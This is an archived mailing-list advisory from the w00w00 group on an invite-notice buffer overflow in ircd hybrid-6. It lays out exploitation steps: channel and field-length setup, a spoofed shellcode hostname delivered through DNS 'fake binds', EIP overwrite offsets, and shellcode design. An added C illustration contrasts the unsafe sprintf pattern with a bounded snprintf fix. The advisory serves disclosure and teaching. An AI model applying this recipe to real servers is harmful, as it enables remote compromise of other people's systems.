[http://www.w00w00.org, comments to shokat_private]

SUMMARY

efnet ircd hybrid-6 (up to beta 58) has a vulnerability that can allow remote access to the irc server. In most cases, you'll gain the privileges of the 'irc' user.

COMMENTS

This vulnerability was discovered by jduck and stranjer of w00w00 at least 2 months ago. After discussing the vulnerability, it was reported to Dianora by jduck and fixed. Hopefully the vulnerable irc servers have been fixed. If not, it's unfortunate Dianora didn't notify the vulnerable irc servers or they didn't take these 2 months to fix themselves (note: we didn't wait that long on purpose.. we were just sidetracked with a million other things).

DESCRIPTION

The vulnerability is in the invite handling code (m_invite). In a channel with operators (ops) and modes +pi (paranoid + invite-only), a channel invitation is reported to all other operators. The buffer used to store the invitation notice can overflow its boundaries by up to 15 bytes.

Steps:

1. Client 1 (9chars!10chars@trivial) joins #199chars
2. Client 2 (trivial!trivial@trivial) joins #199chars
3. Client 1 sets mode #199chars +pio Client 2
4. Client 1 invites Client 3 (9chars!10chars@63chars) to #199chars

Note: client 1 and client 3 should _not_ be from the same host.

With our exploit, client 3 (compile/run hostname.c) goes first, then compile/run ircdexp.c.
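The bug class the description points at is a notice assembled from several attacker-controlled, individually length-limited fields (nick, user, host, channel name) into one fixed-size buffer, where the per-field limits add up to more than the buffer holds. The block below is an added illustration written for this page, not hybrid-6's code: the 512-byte buffer size (NOTICE_BUFSIZE), the notice format string (INVITE_FMT), the struct and function names are all assumptions, and the field lengths come from the advisory's steps (9-char nick, 10-char user, 63-char host, 199-char channel). It shows the unbounded sprintf() pattern next to a bounded builder that refuses a notice that does not fit instead of writing past the buffer. Under the assumed format the worst case overshoots by far more than the 15 bytes the advisory reports for the real code; the numbers here only demonstrate the mechanism.

```c
#include <stdio.h>
#include <string.h>

/* Assumed buffer size for the invite notice (not hybrid-6's real constant). */
#define NOTICE_BUFSIZE 512

/* Assumed notice layout; hybrid-6's actual format string is not reproduced. */
static const char INVITE_FMT[] =
    ":%s!%s@%s NOTICE @%s :%s is inviting %s!%s@%s to %s";

/* Pieces of the notice: the inviting operator, the invited client and the
 * channel.  Each is attacker-controlled up to its own protocol length limit. */
struct invite {
    const char *nick, *user, *host;             /* inviting operator */
    const char *inv_nick, *inv_user, *inv_host; /* invited client */
    const char *chan;
};

/* Vulnerable pattern: trust that the per-field limits keep the total under
 * NOTICE_BUFSIZE and write with sprintf().  With every field at its maximum
 * the notice is longer than the buffer and sprintf() keeps writing past its
 * end.  Shown for contrast only; nothing in this file calls it. */
void build_invite_notice_unbounded(char *buf, const struct invite *iv)
{
    sprintf(buf, INVITE_FMT, iv->nick, iv->user, iv->host, iv->chan,
            iv->nick, iv->inv_nick, iv->inv_user, iv->inv_host, iv->chan);
}

/* Length the notice needs, not counting the terminating NUL. */
static size_t invite_notice_len(const struct invite *iv)
{
    int n = snprintf(NULL, 0, INVITE_FMT, iv->nick, iv->user, iv->host,
                     iv->chan, iv->nick, iv->inv_nick, iv->inv_user,
                     iv->inv_host, iv->chan);
    return n < 0 ? 0 : (size_t)n;
}

/* Hardened form: bounded write plus a caller-visible failure instead of a
 * silently truncated (or overflowed) notice.  Returns 0 on success, -1 if
 * the notice does not fit in outlen bytes; out is always NUL-terminated. */
static int build_invite_notice(char *out, size_t outlen, const struct invite *iv)
{
    int n;
    if (outlen == 0)
        return -1;
    n = snprintf(out, outlen, INVITE_FMT, iv->nick, iv->user, iv->host,
                 iv->chan, iv->nick, iv->inv_nick, iv->inv_user,
                 iv->inv_host, iv->chan);
    if (n < 0 || (size_t)n >= outlen) {
        out[0] = '\0';   /* do not hand a half-built line to the sender */
        return -1;
    }
    return 0;
}

/* Constructed worst case using the field lengths listed in the advisory's
 * steps: 9-char nick, 10-char user, 63-char host, 199-char channel name. */
struct worst_case {
    char nick[10], user[11], host[64];
    char inv_nick[10], inv_user[11], inv_host[64];
    char chan[200];
};

static void fill(char *dst, size_t len, char c)
{
    memset(dst, c, len);
    dst[len] = '\0';
}

static void make_worst_case(struct worst_case *w, struct invite *iv)
{
    fill(w->nick, 9, 'n');     fill(w->user, 10, 'u');     fill(w->host, 63, 'h');
    fill(w->inv_nick, 9, 'N'); fill(w->inv_user, 10, 'U'); fill(w->inv_host, 63, 'H');
    fill(w->chan, 199, '#');
    iv->nick = w->nick;         iv->user = w->user;         iv->host = w->host;
    iv->inv_nick = w->inv_nick; iv->inv_user = w->inv_user; iv->inv_host = w->inv_host;
    iv->chan = w->chan;
}

/* Bytes the worst-case notice needs under the assumed format. */
size_t worst_case_notice_len(void)
{
    struct worst_case w; struct invite iv;
    make_worst_case(&w, &iv);
    return invite_notice_len(&iv);
}

/* What the hardened builder does with the worst case and a 512-byte buffer. */
int worst_case_build_result(void)
{
    struct worst_case w; struct invite iv; char buf[NOTICE_BUFSIZE];
    make_worst_case(&w, &iv);
    return build_invite_notice(buf, sizeof buf, &iv);
}

/* Ordinary-length fields: the hardened builder succeeds and the line is
 * exactly what the format says.  Returns 1 if both hold. */
int short_case_ok(void)
{
    struct invite iv = { "op", "o", "host.example", "bob", "b", "other.example", "#chan" };
    char buf[NOTICE_BUFSIZE];
    if (build_invite_notice(buf, sizeof buf, &iv) != 0)
        return 0;
    return strcmp(buf, ":op!o@host.example NOTICE @#chan :op is inviting "
                       "bob!b@other.example to #chan") == 0;
}

int main(void)
{
    printf("worst-case notice needs %zu bytes, buffer is %d\n",
           worst_case_notice_len(), NOTICE_BUFSIZE);
    printf("bounded build of worst case returns %d (-1 = refused)\n",
           worst_case_build_result());
    printf("ordinary case ok: %d\n", short_case_ok());
    return 0;
}
```

The design point is that the check belongs where the fields are combined, not only where each field is validated: an ircd enforces nick, user, host and channel lengths separately, and each one passing its own limit says nothing about their sum. Refusing the over-long notice (rather than quietly truncating it) is deliberate, because a truncated protocol line can itself be misparsed by the receiving client or server.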
Client #1's server = vulnerable irc server (such as irc.arpa.com)
Client #2's server = trivial
Client #3's server = ComStud irc server (such as irc.prison.net), because it allows shellcode chars in the hostname

Using the following spoofed host (59 chars):

  shellcodeshellcodeshellcodeshellcodeshellcodeshellcode.AAAA

[The ComStud ircd will check for a '.']

Here, EIP = 0x41414141 (AAAA). The other registers are negligible. The hostlen is actually 63 bytes, but for this specific overflow, EIP is overwritten at buf[54-58].

We have to take the stdout/stdin descriptors into consideration. We are very limited in size (only 54 bytes for shellcode), so we can't fit bind shellcode. Instead, we took the standard Linux x86 shellcode, dropped the exit handling code, added a close'd stdin, and dup'd cptr->fd (cptr is the first argument passed to m_invite). Since we only have 54 bytes to work with, we can't fit code to close stdout and dup cptr->fd, so output will be sent to whatever terminal ircd was started from. If you do not wish for the output to be seen, redirect everything (via '>') to /dev/null.

As for how to go about spoofing, you have options:

1) Use the old DNS cache poisoning method
2) Use custom "fake binds" that will just pass on your shellcode as a hostname in response to a DNS query (idea from nyt).

Option #2 is the approach we will take (hostname.c generates the shellcode we'll use). This will work fine as long as your IP/hostname hasn't already been cached. Because these "fake binds" are pretty popular (or have been in the past), they should be easy to come by and are outside the scope of this advisory.

So the full steps are: the client with the spoofed hostname connects to a ComStud ircd server (such as irc.prison.net), another client joins from an arbitrary server, and another client joins on the target ircd hybrid-6 server (such as irc.arpa.com). Once the channel is +pi (and your channel, ident, username, etc. are all the right length), invite the client with the spoofed hostname.
Fine-tune until you have root.

Thanks to: stranjer and jduck for their input and discovery of this vulnerability.

People that deserve hellos: Mike (mikeat_private), vacuum (vacuumat_private), awr (andrewrat_private), dmess0r (dmessorat_private).

-- Matt Conover (Shok) & w00w00 Security Team

[Attachment: ircdexp.tgz, Content-Description "ircd hyb6 exploit"; base64 body not reproduced]
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:56:11 PDT